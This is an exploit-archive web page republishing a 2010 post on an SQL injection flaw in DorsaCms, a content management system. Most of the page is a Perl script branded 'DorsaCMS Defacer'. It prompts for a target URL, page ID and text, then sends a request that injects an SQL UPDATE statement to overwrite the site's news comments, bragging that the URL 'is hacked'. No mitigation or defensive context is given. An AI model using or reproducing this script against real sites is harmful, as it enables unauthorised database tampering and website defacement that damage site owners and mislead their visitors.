首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DorsaCms SQL Injection Vulnerability
来源:d3c0der@hotmail.com 作者:d3c0der 发布时间:2010-12-23  
---------------------------------------------------------
Portal Name: DorsaCms SQL Injection Vulnerability
software : http://dorsagroup.ir
Author : d3c0der - d3c0der@hotmail.com
Date : 16.12.2010
homepage : www.attackerz.ir
spt : netqurd - maarek - l3l4ck.$c0rpi0n
---------------------------------------------------------
d3c0der . . .
#########################################################
exploit , for windows :
#########################################################
#!/usr/bin/perl

#d3c0der

system('color a');

system('cls');

system('title DorsaCMS Defacer');

print q{

===================================================

-= ** =-

DorsaCMS Defacer



[+] Coded by d3c0der => d3c0der@hotmail.com



[+] AttackerZ Under Ground Group => wwW.Attackerz.iR

-= ** =-

===================================================


};


use HTTP::Request;

use LWP::UserAgent;


print "~# Target : ";

$site=<STDIN>;

chomp $site;

print "~# PageID : ";

$id=<STDIN>;

chomp $id;

print "~# Deface Text : ";

$def=<STDIN>;

chomp $def;


if ( $site !~ /^http:/ ) {

$site = 'http://' . $site;

}

if ( $site !~ /\/$/ ) {

$site = $site . '/';

}

print "\n";


print "->hacking : $site\n";



@path1=("ShowPage.aspx?page_=news&PageID=$id update news set
Comment='$def';--");


foreach $ways(@path1){


$final=$site.$ways;


my $req=HTTP::Request->new(GET=>$final);

my $ua=LWP::UserAgent->new();

$ua->timeout(30);

my $response=$ua->request($req);



}


print "[-] now this url is hacked
$site./ShowPage.aspx?page_=news&PageID=.$id\n";



##

# By d3c0der

##
#########################################################


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WMITools ActiveX Remote Comman
·Microsoft WMI Administration T
·Citrix Access Gateway Command
·Mitel Audio and Web Conferenci
·Apple iPhone Safari (JS .) Rem
·HttpBlitz Web Server Denial Of
·Windows 7 IIS7.5 FTPSVC UNAUTH
·Kolibri v2.0 Buffer Overflow R
·Apple iPhone Safari (decodeURI
·Internet Explorer CSS Recursiv
·Apple iPhone Safari (decodeURI
·Linux Kernel < 2.6.36-rc1 CAN
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved